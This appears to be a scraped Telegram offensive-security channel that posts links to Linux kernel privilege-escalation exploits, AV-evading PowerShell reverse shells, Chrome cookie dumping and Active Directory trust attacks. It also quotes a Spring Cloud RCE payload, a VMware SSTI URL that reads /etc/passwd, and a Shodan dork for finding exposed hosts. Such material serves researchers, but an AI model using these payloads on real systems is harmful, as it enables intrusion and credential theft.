CVE-2022-0995
This is my exploit for CVE-2022-0995, an heap out-of-bounds write in the watch_queue Linux kernel component.
It uses the same technique described in https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html.
The exploit targets Ubuntu 21.10 with kernel 5.13.0-37.
The exploit is not 100% reliable, you may need to run it a couple of times. It may panic the kernel, but during my tests it happened rarely.
https://github.com/Bonfee/CVE-2022-0995
#linux #lpe #exploit #cve
This is my exploit for CVE-2022-0995, an heap out-of-bounds write in the watch_queue Linux kernel component.
It uses the same technique described in https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html.
The exploit targets Ubuntu 21.10 with kernel 5.13.0-37.
The exploit is not 100% reliable, you may need to run it a couple of times. It may panic the kernel, but during my tests it happened rarely.
https://github.com/Bonfee/CVE-2022-0995
#linux #lpe #exploit #cve
👍3
CVE-2022-27666
This is the exploit for CVE-2022-27666, a vulnerability that achieves local privilege escalation on the latest Ubuntu Desktop 21.10.
Research:
https://etenal.me/archives/1825
Exploit:
https://github.com/plummm/CVE-2022-27666
#ubuntu #lpe #linux
This is the exploit for CVE-2022-27666, a vulnerability that achieves local privilege escalation on the latest Ubuntu Desktop 21.10.
Research:
https://etenal.me/archives/1825
Exploit:
https://github.com/plummm/CVE-2022-27666
#ubuntu #lpe #linux
ETenal
CVE-2022-27666: Exploit esp6 modules in Linux kernel - ETenal
This post discloses the exploit of CVE-2022-27666, which achieves local privilege escalation on the latest Ubuntu Desktop 21.10.
🔥2
PSSW100AVB
This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.
A list of useful Powershell scripts with 100% AV bypass ratio. (At the time of publication).
Latest Reverse shell tested on Windows 11 (ReverseShell_2022_03.ps1)
https://github.com/tihanyin/PSSW100AVB
#av #evasion #amsi #powershell #ps1
This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.
A list of useful Powershell scripts with 100% AV bypass ratio. (At the time of publication).
Latest Reverse shell tested on Windows 11 (ReverseShell_2022_03.ps1)
https://github.com/tihanyin/PSSW100AVB
#av #evasion #amsi #powershell #ps1
SpringShell: Spring Core RCE
(CVE-2022-22963)
PoC Payload:
https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html
Exploit:
https://github.com/craig/SpringCore0day
(CVE-2022-22963)
PoC Payload:
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("xcalc")
Research:https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html
Exploit:
https://github.com/craig/SpringCore0day
👍5🔥2
The Bug Hunter Methodology
PDF:
https://www.ceos3c.com/wp-content/uploads/2020/06/Bug-Hunter-Methodology-V4-Visualization.pdf
#bugbounty #methodology #xmind
PDF:
https://www.ceos3c.com/wp-content/uploads/2020/06/Bug-Hunter-Methodology-V4-Visualization.pdf
#bugbounty #methodology #xmind
APT
SpringShell: Spring Core RCE (CVE-2022-22963) PoC Payload: spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("xcalc") Research: https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html Exploit: https:/…
Spring4Shell Scan
A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities
Features:
— Support for lists of URLs.
— Fuzzing for more than 10 new Spring4Shell payloads (previously seen tools uses only 1-2 variants).
— Fuzzing for HTTP GET and POST methods.
— Automatic validation of the vulnerability upon discovery.
— Randomized and non-intrusive payloads.
— WAF Bypass payloads.
https://github.com/fullhunt/spring4shell-scan
#spring4shell #spring #scan #tools
A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities
Features:
— Support for lists of URLs.
— Fuzzing for more than 10 new Spring4Shell payloads (previously seen tools uses only 1-2 variants).
— Fuzzing for HTTP GET and POST methods.
— Automatic validation of the vulnerability upon discovery.
— Randomized and non-intrusive payloads.
— WAF Bypass payloads.
https://github.com/fullhunt/spring4shell-scan
#spring4shell #spring #scan #tools
GitHub
GitHub - fullhunt/spring4shell-scan: A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud…
A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities - fullhunt/spring4shell-scan
Unmanaged Code Execution with .NET Dynamic PInvoke
https://bohops.com/2022/04/02/unmanaged-code-execution-with-net-dynamic-pinvoke/
#edr #evasion #pinvoke #csharp #blog
https://bohops.com/2022/04/02/unmanaged-code-execution-with-net-dynamic-pinvoke/
#edr #evasion #pinvoke #csharp #blog
bohops
Unmanaged Code Execution with .NET Dynamic PInvoke
Yes, you read that correctly – “Dynamic Pinvoke” as in “Dynamic Platform Invoke” Background Recently, I was browsing through Microsoft documentation and other blogs to…
Rockyou for Web Fuzzing
This is a wordlist for fuzzing purposes made from the best wordlists currently available, lowercased and deduplicated later with duplicut, added cleaner from BonJarber.
The lists used have been some selected within these repositories:
#web #fuzzing #wordlist
This is a wordlist for fuzzing purposes made from the best wordlists currently available, lowercased and deduplicated later with duplicut, added cleaner from BonJarber.
The lists used have been some selected within these repositories:
— fuzzdbhttps://github.com/six2dez/OneListForAll
— SecLists
— xmendez
— minimaxir
— TheRook
— danielmiessler
— swisskyrepo
— 1N3
— cujanovic
— lavalamp
— ics-default
— jeanphorn
— j3ers3
— nyxxxie
— dirbuster
— dotdotpwn
— hackerone_wordlist
— commonspeak2
— bruteforce-list
— assetnote
#web #fuzzing #wordlist
GitHub
GitHub - six2dez/OneListForAll: Rockyou for web fuzzing
Rockyou for web fuzzing. Contribute to six2dez/OneListForAll development by creating an account on GitHub.
Remotely Dumping Chrome Cookies
The method in this blog post does not require the remote debugger or Keychain (macOS)/DPAPI (Windows) access and applies to Chromium-based browsers in general
https://cedowens.medium.com/remotely-dumping-chrome-cookies-revisited-b25343257209
#chrome #cookie #dump #blog
The method in this blog post does not require the remote debugger or Keychain (macOS)/DPAPI (Windows) access and applies to Chromium-based browsers in general
https://cedowens.medium.com/remotely-dumping-chrome-cookies-revisited-b25343257209
#chrome #cookie #dump #blog
Medium
Remotely Dumping Chrome Cookies…Revisited
TL;DR Security researcher Ron Masas (twitter: @RonMasas) recently wrote a tool (chrome-bandit) that extracts saved password from…
How NAT traversal works
This blog post about NAT and NAT traversal is truly awesome!
https://tailscale.com/blog/how-nat-traversal-works/
#howto #nat #blog
This blog post about NAT and NAT traversal is truly awesome!
https://tailscale.com/blog/how-nat-traversal-works/
#howto #nat #blog
Tailscale
How NAT traversal works
Learn how NAT traversal works, how Tailscale can get through and securely connect your devices directly to each other.
This media is not supported in your browser
VIEW IN TELEGRAM
VMware Workspace ONE — SSTI (CVE-2022-22954)
Successful exploitation could lead to RCE from an unauthenticated user.
Payload:
https://github.com/bewhale/CVE-2022-22954
Shodan Dork:
Successful exploitation could lead to RCE from an unauthenticated user.
Payload:
https://victim/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}
Exploit:https://github.com/bewhale/CVE-2022-22954
Shodan Dork:
http.favicon.hash:-1250474341
#vmware #workspace #ssti #cveSID filter as security boundary between domains?
Microsoft states that "the forest (not the domain) is the security boundary in an Active Directory implementation", meaning that Domain Admins of a child domain is essentially as privileged as Enterprise Admins in a root domain and will have administrative rights in all domains of the forest. Why? We guessed that the default trust between domains inside a forest enables any child domain to trick the root domain to treat child domain users as Enterprise Admins by abusing the SID history (ExtraSids) functionality – this attack/technique is known as "Access Token Manipulation: SID-History Injection" and is explained in a later part of this series.
Kerberos authentication explained (Part 1)
Known AD attacks - from child to parent (Part 2)
SID filtering explained (Part 3)
Bypass SID filtering research (Part 4)
Golden GMSA trust attack - from child to parent (Part 5)
Schema change trust attack - from child to parent (Part 6)
Trust account attack - from trusting to trusted (Part 7)
#ad #trust #kerberus #research
Microsoft states that "the forest (not the domain) is the security boundary in an Active Directory implementation", meaning that Domain Admins of a child domain is essentially as privileged as Enterprise Admins in a root domain and will have administrative rights in all domains of the forest. Why? We guessed that the default trust between domains inside a forest enables any child domain to trick the root domain to treat child domain users as Enterprise Admins by abusing the SID history (ExtraSids) functionality – this attack/technique is known as "Access Token Manipulation: SID-History Injection" and is explained in a later part of this series.
Kerberos authentication explained (Part 1)
Known AD attacks - from child to parent (Part 2)
SID filtering explained (Part 3)
Bypass SID filtering research (Part 4)
Golden GMSA trust attack - from child to parent (Part 5)
Schema change trust attack - from child to parent (Part 6)
Trust account attack - from trusting to trusted (Part 7)
#ad #trust #kerberus #research
itm8.dk
Skal vi skabe nutidens og fremtidens IT sammen? itm8
Hvad er en itm8? Vi er præcis, hvad navnet siger: Din m8* (*mate), der er ekspert i IT. Vi er din partner til 360 graders IT.
👍1